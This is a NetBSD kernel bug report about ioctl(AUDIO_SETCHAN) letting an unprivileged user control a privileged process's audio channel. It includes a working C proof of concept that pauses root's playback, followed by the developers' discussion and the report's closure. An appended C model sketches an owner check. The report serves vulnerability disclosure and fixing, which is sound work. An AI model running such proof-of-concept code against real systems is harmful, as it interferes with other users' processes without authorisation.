NetBSD Problem Report #52627

From www@NetBSD.org  Wed Oct 18 13:26:10 2017
Return-Path: <www@NetBSD.org>
Received: from mail.netbsd.org (mail.netbsd.org [199.233.217.200])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
	(Client CN "mail.NetBSD.org", Issuer "mail.NetBSD.org CA" (not verified))
	by mollari.NetBSD.org (Postfix) with ESMTPS id BB0C77A20D
	for <gnats-bugs@gnats.NetBSD.org>; Wed, 18 Oct 2017 13:26:10 +0000 (UTC)
Message-Id: <20171018132609.B025F7A2A9@mollari.NetBSD.org>
Date: Wed, 18 Oct 2017 13:26:09 +0000 (UTC)
From: isaki@pastel-flower.jp
Reply-To: isaki@pastel-flower.jp
To: gnats-bugs@NetBSD.org
Subject: ioctl(AUDIO_SETCHAN) is able to affect privileged process
X-Send-Pr-Version: www-1.0

>Number:         52627
>Category:       kern
>Synopsis:       ioctl(AUDIO_SETCHAN) is able to affect privileged process
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    isaki
>State:          closed
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Wed Oct 18 13:30:00 +0000 2017
>Closed-Date:    Sat May 25 03:16:52 +0000 2019
>Last-Modified:  Sat May 25 03:16:52 +0000 2019
>Originator:     Tetsuya Isaki
>Release:        NetBSD 8.0_BETA
>Organization:
>Environment:
NetBSD 8.0_BETA i386
>Description:
ioctl(AUDIO_SETCHAN) allows subsequent audio ioctls to be issued to other
virtual channels.  The virtual channel number does not have credentials
(and is predictable).
This allows an unprivileged user to issue any audio ioctls to a privileged
process (even if sysctl hw.<dev>.multiuser = 0).

>How-To-Repeat:
% cat a.c
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/audioio.h>
#include <sys/ioctl.h>

int main(int ac, char *av[])
{
	audio_info_t ai;
	int fd;
	int r;
	int val;

	fd = open("/dev/audioctl", O_RDWR);
	if (fd == -1)
		err(1, "open");

	/* fd is virtual channel 1, so upcoming virtual channel will be 2 */
	val = 2;
	r = ioctl(fd, AUDIO_SETCHAN, &val);
	if (r == -1)
		err(1, "AUDIO_SETCHAN");

	AUDIO_INITINFO(&ai);
	ai.play.pause = 1;
	for (;;) {
		usleep(1000);
		r = ioctl(fd, AUDIO_SETINFO, &ai);
		if (r == -1) {
			if (errno != ENXIO)
				err(1, "AUDIO_SETINFO");
			continue;
		}
		printf("pause!\n");
		break;
	}

	close(fd);
	return 0;
}

%

 (First, execute this sample code as an unprivileged user)

% id -u
100
% gcc a.c
% ./a.out

 (Then, start playback as a privileged user)

# id -u
0
# audioplay somemusic.wav

 (this playback soon pauses and the process blocks...)

>Fix:
N/A.
In the narrow view, the virtual channel number also needs credentials? But
I don't know about the security area.
In the wide view, however, I think the new audio behavior (specification)
needs more consideration before 8.0.

>Release-Note:

>Audit-Trail:

Responsible-Changed-From-To: kern-bug-people->nat
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Tue, 22 May 2018 02:34:05 +0000
Responsible-Changed-Why:
I'll handle this.


From: Nathanial Sloss <nat@netbsd.org>
To: gnats-bugs@netbsd.org
Cc: 
Subject: Re: kern/52627 audio_setchan affecting privileged process
Date: Mon, 28 May 2018 11:07:12 +1000

 Hi,

 I have a proposed fix for affecting a privileged process.

 Please see:

 http://mail-index.netbsd.org/tech-kern/2018/05/28/msg023451.html

 Please let me know if this works for you.

 Best regards,

 Nat

From: matthew green <mrg@eterna.com.au>
To: gnats-bugs@NetBSD.org
Cc: nat@NetBSD.org, gnats-admin@netbsd.org, netbsd-bugs@netbsd.org,
    isaki@pastel-flower.jp
Subject: re: kern/52627 audio_setchan affecting privileged process
Date: Sat, 02 Jun 2018 04:24:39 +1000

 i don't think this is a real bug.  as i just posted to tech-kern:

 > i object to the plan here.  we should simply just use the
 > file system to control this, like normal unix stuff.
 > 
 > eg, ttyaction should chown the audio device to the console
 > user or whatever the admin chooses.  it should be possible
 > for me to decide to make things as open or as closed as
 > possible via chown/chmod/mknod/rm.


 .mrg.

Responsible-Changed-From-To: nat->kern-bug-people
Responsible-Changed-By: nat@NetBSD.org
Responsible-Changed-When: Wed, 08 May 2019 21:55:03 +0000
Responsible-Changed-Why:


Responsible-Changed-From-To: kern-bug-people->isaki
Responsible-Changed-By: isaki@NetBSD.org
Responsible-Changed-When: Sat, 25 May 2019 03:16:52 +0000
Responsible-Changed-Why:


State-Changed-From-To: open->closed
State-Changed-By: isaki@NetBSD.org
State-Changed-When: Sat, 25 May 2019 03:16:52 +0000
State-Changed-Why:
By merging the isaki-audio2 branch, AUDIO_SETCHAN is now obsoleted.


>Unformatted:
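
Added example, not part of the original report and not NetBSD code: a user-space C model of the "narrow view" idea raised under >Fix, where each virtual channel records its owner and the comparison happens when a request is applied, not when the channel number is selected, because the number can be selected before the channel exists. The names vchan, ctlfd, vchan_open, ctl_setchan and ctl_pause are hypothetical, and letting uid 0 act on any channel is an assumption.

```c
/* Added user-space model; every name is hypothetical, not a NetBSD kernel symbol. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#define MAXCHAN 8
struct vchan { int in_use; uid_t owner; int paused; };
struct ctlfd { uid_t opener; int target; };  /* models an open /dev/audioctl */
static struct vchan chans[MAXCHAN];          /* slot 0 is never allocated */

/* Hands out the lowest free number, so numbers are predictable as in the report. */
int vchan_open(uid_t uid)
{
	for (int i = 1; i < MAXCHAN; i++)
		if (!chans[i].in_use) {
			chans[i] = (struct vchan){ .in_use = 1, .owner = uid };
			return i;
		}
	return -1;
}

/* SETCHAN-like step: only records a number; the channel may not exist yet. */
int ctl_setchan(struct ctlfd *c, int n)
{
	if (n < 1 || n >= MAXCHAN)
		return EINVAL;
	c->target = n;
	return 0;
}

/* SETINFO-like step: the owner is compared when the request is applied. */
int ctl_pause(struct ctlfd *c)
{
	struct vchan *v = &chans[c->target];
	if (!v->in_use)
		return ENXIO;
	if (c->opener != 0 && c->opener != v->owner)  /* assumption: uid 0 may cross */
		return EPERM;
	v->paused = 1;
	return 0;
}

int main(void)
{
	struct ctlfd c = { .opener = 100, .target = vchan_open(100) };
	ctl_setchan(&c, 2);              /* channel 2 does not exist yet */
	int before = ctl_pause(&c);      /* no such channel: ENXIO */
	vchan_open(0);                   /* privileged playback is given channel 2 */
	printf("before=%d after=%d paused=%d\n", before, ctl_pause(&c), chans[2].paused);
	return 0;
}
```

The PR itself was closed by obsoleting AUDIO_SETCHAN, not by a check of this kind.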
